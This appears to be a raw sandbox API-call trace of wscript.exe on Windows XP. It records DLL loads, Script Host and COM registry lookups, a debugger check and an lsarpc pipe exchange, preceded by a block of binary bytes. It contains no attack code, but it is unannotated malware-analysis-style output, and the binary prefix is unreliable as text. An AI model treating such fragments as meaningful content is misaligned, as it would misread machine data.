\xed\xce\xa0/-\xbf\xd5\x16\x04\xf4\xf05r\xbe\xd7\x9c\xfd+\x11\xb1\xc2}\x85\xfd+\x11\xb1\xc2}\x85\xfd+\x11\xb1\xc2}\x85\xfd+\x11\xb1\xc2}\x85\xfd+\x11\xb1\xc2}\x85\xfd+\x11\xb1\xc2\x1f\xd2\xc0h\x18\xb8t\xeeJ\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 | SUCCESS | 0x00000001 | |
| 19:40:26,253 | 252 | LdrLoadDll | Flags => 1308796 BaseAddress => 0x5ad70000 FileName => C:\WINDOWS\system32\uxtheme.dll | SUCCESS | 0x00000000 | |
| 19:40:26,253 | 252 | IsDebuggerPresent | | FAILURE | 0x00000000 | |
| 19:40:26,253 | 252 | LdrLoadDll | Flags => 1308616 BaseAddress => 0x5ad70000 FileName => uxtheme.dll | SUCCESS | 0x00000000 | |
| 19:40:26,253 | 252 | GetSystemMetrics | SystemMetricIndex => 31 | SUCCESS | 0x00000019 | |
| 19:40:26,253 | 252 | ZwMapViewOfSection | SectionOffset => 0x0013f6b0 SectionHandle => 0x000000ac ProcessHandle => 0xffffffff BaseAddress => 0x00b00000 | SUCCESS | 0x00000000 | |
| 19:40:26,253 | 252 | GetSystemMetrics | SystemMetricIndex => 31 | SUCCESS | 0x00000019 | 1 time |
| 19:40:26,253 | 252 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Microsoft\Windows Script Host\Settings | FAILURE | 0x00000002 | |
| 19:40:26,253 | 252 | RegOpenKeyExW | Handle => 0x000000b8 Registry => 0x80000002 SubKey => Software\Microsoft\Windows Script Host\Settings | SUCCESS | 0x00000000 | |
| 19:40:26,253 | 252 | RegQueryValueExW | Handle => 0x000000b8 DataLength => 1024 ValueName => Enabled Type => 1306708 | FAILURE | 0x00000002 | |
| 19:40:26,253 | 252 | LdrGetDllHandle | ModuleHandle => 0x00000000 FileName => C:\WINDOWS\system32\winlogon.exe | FAILURE | 0xc0000135 | 1 time |
| 19:40:26,253 | 252 | RegOpenKeyExW | Handle => 0x000000c4 Registry => 0x80000002 SubKey => Software\Microsoft\Ole | SUCCESS | 0x00000000 | |
| 19:40:26,253 | 252 | RegQueryValueExW | Handle => 0x000000c4 DataLength => 4 ValueName => MaximumAllowedAllocationSize Type => 1308492 | FAILURE | 0x00000002 | |
| 19:40:26,253 | 252 | RegCloseKey | Handle => 0x000000c4 | SUCCESS | 0x00000000 | |
| 19:40:26,253 | 252 | LdrLoadDll | Flags => 1308456 BaseAddress => 0x00b50000 FileName => xpsp2res.dll | SUCCESS | 0x00000000 | |
| 19:40:26,253 | 252 | NtOpenKey | DesiredAccess => 131097 KeyHandle => 0x000000c4 ObjectAttributes => \Registry\Machine\System\CurrentControlSet\Control\ComputerName | SUCCESS | 0x00000000 | |
| 19:40:26,253 | 252 | NtOpenKey | DesiredAccess => 131097 KeyHandle => 0x000000cc ObjectAttributes => ActiveComputerName | SUCCESS | 0x00000000 | |
| 19:40:26,253 | 252 | NtQueryValueKey | Information => M\x00I\x00K\x00E\x00-\x00B\x00D\x000\x001\x009\x006\x00D\x000\x003\x009\x00\x00\x00 KeyHandle => 0x000000cc ValueName => ComputerName Type => 1 | SUCCESS | 0x00000000 | |
| 19:40:26,253 | 252 | NtCreateFile | ShareAccess => 3 FileName => PIPE\lsarpc DesiredAccess => 0xc0100080 CreateDisposition => 1 FileHandle => 0x000000d8 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtSetInformationFile | FileHandle => 0x000000d8 FileInformation => | SUCCESS | 0x00000000 | 1 time |
| 19:40:26,263 | 252 | NtWriteFile | Buffer => \x05\x00\x0b\x03\x10\x00\x00\x00H\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00xW4\x124\x12\xcd\xab\xef\x00\x01#Eg\x89\xab\x00\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00 FileHandle => 0x000000d8 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtReadFile | Buffer => \x05\x00\x0c\x03\x10\x00\x00\x00D\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\xfc$\x00\x00\x0c\x00\PIPE\lsass\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00 FileHandle => 0x000000d8 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | RegCloseKey | Handle => 0x000000b8 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Microsoft\Windows Script Host\Settings | FAILURE | 0x00000002 | |
| 19:40:26,263 | 252 | RegOpenKeyExW | Handle => 0x000000b8 Registry => 0x80000002 SubKey => Software\Microsoft\Windows Script Host\Settings | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | RegQueryValueExW | Handle => 0x000000b8 DataLength => 1024 ValueName => LogSecuritySuccesses Type => 1306108 | FAILURE | 0x00000002 | |
| 19:40:26,263 | 252 | RegCloseKey | Handle => 0x000000b8 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | LdrGetDllHandle | ModuleHandle => 0x01000000 FileName => C:\WINDOWS\system32\wscript.exe | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | LdrLoadDll | Flags => 1308256 BaseAddress => 0x01000000 FileName => C:\WINDOWS\system32\wscript.exe | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | LdrGetDllHandle | ModuleHandle => 0x01000000 FileName => C:\WINDOWS\system32\wscript.exe | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | LdrLoadDll | Flags => 1306412 BaseAddress => 0x01000000 FileName => C:\WINDOWS\system32\wscript.exe | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | RegOpenKeyExW | Handle => 0x000000b8 Registry => 0x80000002 SubKey => Software\Microsoft\Windows Script Host\Settings | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | RegQueryValueExW | Handle => 0x000000b8 DataLength => 1024 ValueName => IgnoreUserSettings Type => 1305296 | FAILURE | 0x00000002 | |
| 19:40:26,263 | 252 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Microsoft\Windows Script Host\Settings | FAILURE | 0x00000002 | |
| 19:40:26,263 | 252 | RegQueryValueExW | Handle => 0x000000b8 DataLength => 4 ValueName => TrustPolicy Type => 1308408 | FAILURE | 0x00000002 | |
| 19:40:26,263 | 252 | RegQueryValueExW | Handle => 0x000000b8 Data => 1\x00\x00\x00 ValueName => UseWINSAFER | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | RegCloseKey | Handle => 0x000000b8 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | RegCreateKeyExW | Handle => 0x000000b8 Access => 131097 Registry => 0x80000002 Class => SubKey => Software\Microsoft\Windows Script Host\Settings | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | RegQueryValueExW | Handle => 0x000000b8 DataLength => 4 ValueName => Timeout Type => 1308416 | FAILURE | 0x00000002 | |
| 19:40:26,263 | 252 | RegQueryValueExW | Handle => 0x000000b8 Data => 1\x00\x00\x00 ValueName => DisplayLogo | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | RegCloseKey | Handle => 0x000000b8 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | RegCreateKeyExW | Handle => 0x000000c8 Access => 131097 Registry => 0x80000001 Class => SubKey => Software\Microsoft\Windows Script Host\Settings | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | RegQueryValueExW | Handle => 0x000000c8 DataLength => 4 ValueName => Timeout Type => 1308416 | FAILURE | 0x00000002 | |
| 19:40:26,263 | 252 | RegQueryValueExW | Handle => 0x000000c8 DataLength => 1024 ValueName => DisplayLogo Type => 1305308 | FAILURE | 0x00000002 | |
| 19:40:26,263 | 252 | RegCloseKey | Handle => 0x000000c8 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | LdrGetDllHandle | ModuleHandle => 0x774e0000 FileName => ole32.dll | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | LdrGetProcedureAddress | Ordinal => 0 FunctionName => CoCreateInstanceEx FunctionAddress => 0x77500526 ModuleHandle => 0x774e0000 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | LdrLoadDll | Flags => 1307056 BaseAddress => 0x77120000 FileName => oleaut32.dll | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtCreateFile | ShareAccess => 1 FileName => C:\WINDOWS\system32\wscript.exe DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000000c8 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtQueryInformationFile | FileHandle => 0x000000c8 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtSetInformationFile | FileHandle => 0x000000c8 FileInformation => | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtReadFile | Buffer => MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00 FileHandle => 0x000000c8 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtSetInformationFile | FileHandle => 0x000000c8 FileInformation => | SUCCESS | 0x00000000 | 1 time |
| 19:40:26,263 | 252 | NtReadFile | Buffer => PE\x00\x00 FileHandle => 0x000000c8 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtReadFile | Buffer => L\x01\x04\x00\x90N>G\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x02\x01 FileHandle => 0x000000c8 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtQueryInformationFile | FileHandle => 0x000000c8 FileInformation => \x10\x01\x00\x00\x00\x00\x00\x00 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtSetInformationFile | FileHandle => 0x000000c8 FileInformation => | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtReadFile | Buffer => .text\x00\x00\x00\xfcs\x01\x00\x00\x10\x00\x00\x00\x80\x01\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00` FileHandle => 0x000000c8 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtReadFile | Buffer => .data\x00\x00\x00\xdc\x04\x00\x00\x00\x90\x01\x00\x00\x10\x00\x00\x00\x90\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\xc0 FileHandle => 0x000000c8 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtReadFile | Buffer => .rsrc\x00\x00\x00\xd0\x94\x00\x00\x00\xa0\x01\x00\x00\xa0\x00\x00\x00\xa0\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00@ FileHandle => 0x000000c8 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtQueryInformationFile | FileHandle => 0x000000c8 FileInformation => h\x02\x00\x00\x00\x00\x00\x00 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtSetInformationFile | FileHandle => 0x000000c8 FileInformation => | SUCCESS | 0x00000000 | 1 time |
| 19:40:26,263 | 252 | NtReadFile | Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x04\x00 FileHandle => 0x000000c8 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtReadFile | Buffer => P\x06\x00\x80@\x00\x00\x80 FileHandle => 0x000000c8 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtQueryInformationFile | FileHandle => 0x000000c8 FileInformation => \x18\xa0\x01\x00\x00\x00\x00\x00 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtSetInformationFile | FileHandle => 0x000000c8 FileInformation => | SUCCESS | 0x00000000 | 1 time |
| 19:40:26,263 | 252 | NtReadFile | Buffer => \x03\x00 FileHandle => 0x000000c8 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtSetInformationFile | FileHandle => 0x000000c8 FileInformation => | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtReadFile | Buffer => @\x06\x00\x80X\x00\x00\x80 FileHandle => 0x000000c8 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtQueryInformationFile | FileHandle => 0x000000c8 FileInformation => \xa0\x01\x00\x00\x00\x00\x00 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtSetInformationFile | FileHandle => 0x000000c8 FileInformation => | SUCCESS | 0x00000000 | 1 time |
| 19:40:26,263 | 252 | NtReadFile | Buffer => \x07\x00 FileHandle => 0x000000c8 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtReadFile | Buffer => T\x00Y\x00P\x00E\x00L\x00I\x00B\x00 FileHandle => 0x000000c8 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtSetInformationFile | FileHandle => 0x000000c8 FileInformation => | SUCCESS | 0x00000000 | 1 time |
| 19:40:26,263 | 252 | NtQueryInformationFile | FileHandle => 0x000000c8 FileInformation => h\x02\x00\x00\x00\x00\x00\x00 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtSetInformationFile | FileHandle => 0x000000c8 FileInformation => | SUCCESS | 0x00000000 | 1 time |
| 19:40:26,263 | 252 | NtReadFile | Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00 FileHandle => 0x000000c8 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtQueryInformationFile | FileHandle => 0x000000c8 FileInformation => h\xa0\x01\x00\x00\x00\x00\x00 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtSetInformationFile | FileHandle => 0x000000c8 FileInformation => | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtReadFile | Buffer => \x01\x00\x00\x00\xa8\x01\x00\x80 FileHandle => 0x000000c8 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtSetInformationFile | FileHandle => 0x000000c8 FileInformation => | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtQueryInformationFile | FileHandle => 0x000000c8 FileInformation => h\x02\x00\x00\x00\x00\x00\x00 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtSetInformationFile | FileHandle => 0x000000c8 FileInformation => | SUCCESS | 0x00000000 | 1 time |
| 19:40:26,263 | 252 | NtReadFile | Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 FileHandle => 0x000000c8 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtReadFile | Buffer => \x04\x00\x00p\x04\x00\x00 FileHandle => 0x000000c8 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtSetInformationFile | FileHandle => 0x000000c8 FileInformation => | SUCCESS | 0x00000000 | 1 time |
| 19:40:26,263 | 252 | NtReadFile | Buffer => \xd0\xba\x01\x00\xccP\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000000c8 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtQueryInformationFile | FileHandle => 0x000000c8 FileInformation => \x00`\x02\x00\x00\x00\x00\x00\x00`\x02\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | NtCreateSection | ObjectAttributes => DesiredAccess => 0x000f0005 SectionHandle => 0x000000b8 FileHandle => 0x000000c8 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | ZwMapViewOfSection | SectionOffset => 0x0013e910 SectionHandle => 0x000000b8 ProcessHandle => 0xffffffff BaseAddress => 0x00e20000 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | LdrLoadDll | Flags => 1307044 BaseAddress => 0x7e720000 FileName => SXS.DLL | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | LdrGetProcedureAddress | Ordinal => 0 FunctionName => SxsOleAut32MapConfiguredClsidToReferenceClsid FunctionAddress => 0x7e745c0d ModuleHandle => 0x7e720000 | SUCCESS | 0x00000000 | |
| 19:40:26,263 | 252 | CreateThread | ThreadId => 292 StartRoutine => 0x01002fd4 Parameter => 0x00434aa8 CreationFlags => 0 | SUCCESS | 0x000000dc | |
| 19:40:26,293 | 292 | GetSystemMetrics | SystemMetricIndex => 31 | SUCCESS | 0x00000019 | 2 times |
| 19:40:26,293 | 252 | RegOpenKeyExW | Handle => 0x000000ee Registry => 0x80000000 SubKey => .vbs | SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegQueryValueExW | Handle => 0x000000ee Data => V\x00B\x00S\x00F\x00i\x00l\x00e\x00\x00\x00 ValueName => | SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegCloseKey | Handle => 0x000000ee | SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW | Handle => 0x000000ee Registry => 0x80000000 SubKey => VBSFile\ScriptEngine | SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegQueryValueExW | Handle => 0x000000ee Data => V\x00B\x00S\x00c\x00r\x00i\x00p\x00t\x00\x00\x00 ValueName => | SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegCloseKey | Handle => 0x000000ee | SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW | Handle => 0x000000ee Registry => 0x80000000 SubKey => VBScript | SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW | Handle => 0x000000f2 Registry => 0x000000ee SubKey => CLSID | SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegQueryValueExW | Handle => 0x000000f2 Data => {\x00B\x005\x004\x00F\x003\x007\x004\x001\x00-\x005\x00B\x000\x007\x00-\x001\x001\x00c\x00f\x00-\x00A\x004\x00B\x000\x00-\x000\x000\x00A\x00A\x000\x000\x004\x00A\x005\x005\x00E\x008\x00}\x00\x00\x00 ValueName => | SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegCloseKey | Handle => 0x000000ee | SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW | Handle => 0x000000ec Registry => 0x80000002 SubKey => Software\Microsoft\COM3 | SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegQueryValueExW | Handle => 0x000000ec Data => 1 ValueName => Com+Enabled | SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegCloseKey | Handle => 0x000000ec | SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | LdrLoadDll | Flags => 1306592 BaseAddress => 0x76fd0000 FileName => CLBCATQ.DLL | SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | LdrGetProcedureAddress | Ordinal => 0 FunctionName => GetCatalogObject FunctionAddress => 0x76fd3f78 ModuleHandle => 0x76fd0000 | SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW | Handle => 0x000000ec Registry => 0x80000002 SubKey => Software\Microsoft\COM3 | SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegQueryValueExW | Handle => 0x000000ec Data => 1 ValueName => Com+Enabled | SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegCloseKey | Handle => 0x000000ec | SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | LdrLoadDll | Flags => 1306592 BaseAddress => 0x76fd0000 FileName => CLBCATQ.DLL | SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | LdrGetProcedureAddress | Ordinal => 0 FunctionName => GetCatalogObject2 FunctionAddress => 0x76fd4017 ModuleHandle => 0x76fd0000 | SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | LdrGetDllHandle | ModuleHandle => 0x774e0000 FileName => ole32.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CLSIDFromOle1Class FunctionAddress => 0x775188b9 ModuleHandle => 0x774e0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | NtOpenKey |
DesiredAccess => 33554432 KeyHandle => 0x000000f0 ObjectAttributes => \Registry\User\S-1-5-21-1960408961-789336058-1343024091-1003_Classes |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x000000ec Registry => 0x80000002 SubKey => Software\Classes |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x000000f8 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | NtOpenKey |
DesiredAccess => 16 KeyHandle => 0x00000100 ObjectAttributes => \REGISTRY\USER |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000108 Registry => 0x80000002 SubKey => Software\Classes |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | NtOpenKey |
DesiredAccess => 16 KeyHandle => 0x00000110 ObjectAttributes => \REGISTRY\USER |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000118 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000120 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000128 Registry => 0x80000002 SubKey => Software\Classes\CLSID |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000130 Registry => 0x80000002 SubKey => Software\Classes |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000138 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | NtOpenKey |
DesiredAccess => 16 KeyHandle => 0x00000140 ObjectAttributes => \REGISTRY\USER |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000148 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000150 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000158 Registry => 0x80000002 SubKey => Software\Classes\CLSID |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000160 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegQueryValueExW |
Handle => 0x00000160 Data => ValueName => REGDBVersion |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegCloseKey |
Handle => 0x00000160 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | LdrGetDllHandle |
ModuleHandle => 0x7c800000 FileName => KERNEL32.DLL |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InitializeCriticalSectionAndSpinCount FunctionAddress => 0x7c80b8b9 ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | NtCreateFile |
ShareAccess => 1 FileName => C:\WINDOWS\Registration\R000000000007.clb DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000160 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | NtQueryInformationFile |
FileHandle => 0x00000160 FileInformation => \x00`\x00\x00\x00\x00\x00\x00\xf0W\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | NtSetInformationFile |
FileHandle => 0x00000160 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,293 | 252 | NtReadFile |
Buffer => COM+\x01\x00\x00\x00\x01\x00\x12\x00$\x00\x00\x00\x00\x01\x01\x00c\x00\x00\x00\x00\x00\x00\x01\x01\x00\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00F\x0e\x00\x00\x000\x01\x00\x00\xa0\x03\x00\x003_0\x00\xd0\x04\x00\x00\x0c\x00\x00\x003_1\x00\xdc\x04\x00\x00\x88\x02\x00\x003_2\x00d\x07\x00\x00<\x00\x00\x003_3\x00\xa0\x07\x00\x00\x90\x08\x00\x003_4\x000\x10\x00\x00(\x00\x00\x003_5\x00X\x10\x00\x00(\x00\x00\x003_6\x00\x80\x10\x00\x00(\x00\x00\x003_7\x00\xa8\x10\x00\x00\x88\x10\x00\x003_8\x000!\x00\x00\xa8 \x00\x003_9\x00\xd8*\x00\x00<\x04\x00\x003_10\x00\x00\x00\x00\x14/\x00\x00\x0c\x01\x00\x003_11\x00\x00\x00\x00 0\x00\x00\x1c\x00\x00\x003_12\x00\x00\x00\x00<0\x00\x00\x14\x00\x00\x003_16\x00\x00\x00\x00P0\x00\x00\x90\x0e\x00\x00#Schema\x00\xe0>\x00\x00 FileHandle => 0x00000160 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000160 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegQueryValueExW |
Handle => 0x00000160 Data => ValueName => REGDBVersion |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegCloseKey |
Handle => 0x00000160 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000162 Registry => 0x000000f2 SubKey => CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8} |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x00000162 SubKey => TreatAs |
FAILURE | 0x00000002 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000166 Registry => 0x000000f2 SubKey => |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegCloseKey |
Handle => 0x00000162 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x00000162 Registry => 0x00000166 SubKey => CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8} |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
Handle => 0x0000016a Registry => 0x00000162 SubKey => InprocServer32 |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegQueryValueExW |
Handle => 0x0000016a DataLength => 1000 ValueName => InprocServer32 Type => 1581080 |
FAILURE | 0x00000002 | |
| 19:40:26,293 | 252 | RegCloseKey |
Handle => 0x0000016a |
SUCCESS | 0x00000000 | |
| 19:40:26,293 | 252 | RegOpenKeyExW |
